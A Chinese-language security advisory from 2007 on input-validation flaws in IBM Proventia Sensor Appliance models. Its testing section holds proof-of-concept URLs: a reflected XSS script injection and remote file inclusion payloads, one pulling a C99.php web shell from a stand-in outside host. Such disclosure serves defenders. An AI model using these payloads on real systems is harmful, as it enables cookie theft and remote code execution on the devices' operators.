发布日期：2007-07-11
更新日期：2007-07-11

受影响系统：

IBM Proventia Sensor Appliance GX5108
IBM Proventia Sensor Appliance GX5008

描述：

---

BUGTRAQ  ID: 24864

IBM Proventia Sensor Appliance是网络入侵感应器设备。

IBM Proventia Sensor Appliance CX5108、GX5008在实现上存在多个输入验证漏洞，包括远程文件包含漏洞和跨站脚本漏洞，攻击者可利用这些漏洞窃取cookie身份验证凭证、查看文件并执行任意服务器端脚本代码。

<*来源：Alex Hernandez （al3xhernandez@ureach.com）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

跨站脚本：

https://www.example.com/alert.php?reminder=--&gt;//&quot;&gt;&lt;script&gt;alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);&lt;/script&gt;

远程文件包含：

http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php

https://www.example.com/main.php?page=https://www.example2.com

建议：

---

厂商补丁：

IBM
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ibm.com/support/fixcentral/

浏览次数：1905
严重程度：0（网友投票）